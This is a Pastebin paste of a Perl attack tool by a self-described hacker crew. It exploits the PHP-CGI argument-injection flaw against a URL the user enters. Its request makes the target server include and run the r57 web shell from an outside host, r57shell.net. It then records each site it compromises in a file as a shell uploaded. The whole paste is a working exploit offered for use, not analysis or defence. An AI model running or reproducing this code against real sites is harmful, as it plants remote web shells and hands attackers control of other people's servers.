supermanavc

PHP CGI INJECTION Fatal Error Crew Tool VS 0.1 - BY SUP3RM4N

Nov 18th, 2013
669
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #/!/usr/bin/perl
  2. ##################################################################
  3. # ______    _        _   _____
  4. #|  ___|_ _| |_ __ _| | | ____|_ __ _ __ ___  _ __
  5. #| |_ / _` | __/ _` | | |  _| | '__| '__/ _ \| '__|
  6. #|  _| (_| | |_ (_| | | | |___| |  | | | (_) | |  
  7. #|_|  \__,_|\__\__,_|_| |_____|_|  |_|  \___/|_|
  8. #
  9. # By sup3rm4n - 2013 ©
  10. # Made in Brazil
  11. # Somos: Elemento_pcx & s4r4d0 & sup3rm4n
  12. # Twitter: @FatalErrorSec
  13. # Fatal Error Crew  [ 2001 ~ 2013 ]
  14. #
  15. ##################################################################
  16.  
  17. use LWP::UserAgent;
  18. use HTTP::Request;
  19. use Term::ANSIColor;
  20. my $ua = LWP::UserAgent->new();
  21. $ua ->timeout(15);
  22.  
  23.   print color("green"),
  24. q{  _____     _        _   _____
  25.  |  ___|_ _| |_ __ _| | | ____|_ __ _ __ ___  _ __
  26.  | |_ / _` | __/ _` | | |  _| | '__| '__/ _ \| '__|
  27. |  _| (_| | |_ (_| | | | |___| |  | | | (_) | |
  28. |_|  \__,_|\__\__,_|_| |_____|_|  |_|  \___/|_|
  29. ====================================================
  30.   # PHP CGI INJECTION 0.1
  31.   # By sup3rm4n - 2013 ©
  32.   # Made in Brazil
  33.   # Somos: Elemento_pcx & s4r4d0 & sup3rm4n
  34.   # Fatal Error Crew  [ 2001 ~ 2013 ]
  35. ====================================================
  36.  
  37.  Digite a url do site
  38. };
  39. print " -->> ";
  40.  
  41. $site =<STDIN>;
  42. chomp($site);
  43.  
  44.  my $lol = "http://".$site if ($site !~ m/http:\/\//);
  45.  my $test .= $lol."/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://r57shell.net/shell/r57.txt%20-n";
  46.  my $request = HTTP::Request -> new (GET => $test);
  47.  my $resposta = $ua -> request ( $request );
  48.  
  49. if( $resposta -> content =~ /r57shell/ && $resposta -> content =~ /shell/ )
  50. {
  51.   open(x,">>uploaded.txt");
  52.   print x "$lol\n";
  53.   close(x);
  54.   print "\n Site vulnerável -- Shell upada\n\n";
  55.   print color("red"), "[+] $test\n\n";
  56.  
  57. }
  58.  
  59. else {
  60.    print "\n\n  O site $lol não está vulnerável. \n\n" ;
  61. }
RAW Paste Data